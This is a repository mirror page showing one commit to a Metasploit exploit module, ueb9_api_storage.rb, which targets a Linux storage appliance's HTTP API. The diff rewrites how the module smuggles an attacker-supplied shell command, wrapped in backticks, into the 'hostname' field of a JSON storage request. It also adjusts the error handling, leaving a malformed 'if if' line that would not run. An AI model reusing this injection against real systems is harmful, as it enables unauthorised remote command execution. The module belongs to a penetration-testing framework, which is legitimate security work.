infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update ueb9_api_storage.rb

bug/bundler_fix
caleBot 2017-10-20 13:48:29 -06:00 committed by GitHub
parent 8febde8291
commit abc749e1e8
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

8
modules/exploits/linux/http/ueb9_api_storage.rb
View File

@ -67,7 +67,9 @@ class MetasploitModule < Msf::Exploit::Remote
session = Base64.strict_encode64(session) #b64 encode session token session = Base64.strict_encode64(session) #b64 encode session token
#substitue the cmd into the hostname parameter #substitue the cmd into the hostname parameter
parms = "{\"type\":4,\"name\":\"_Stateless\",\"usage\":\"stateless\",\"build_filesystem\":1,\"properties\":{\"username\":\"aaaa\",\"password\":\"aaaa\",\"hostname\":\"`#{filter_bad_chars(cmd)}` &\",\"port\":\"2049\",\"protocol\":\"nfs\",\"share_name\":\"aaa\"}}" parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
res = send_request_cgi({ res = send_request_cgi({
@ -80,8 +82,8 @@ class MetasploitModule < Msf::Exploit::Remote
{'AuthToken' => session,} {'AuthToken' => session,}
}) })
if res.code != 500 if if res &&res.code != 500
print_error("Unexpected response") fail_with(Failure::UnexpectedReply,'Unexpected response')
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")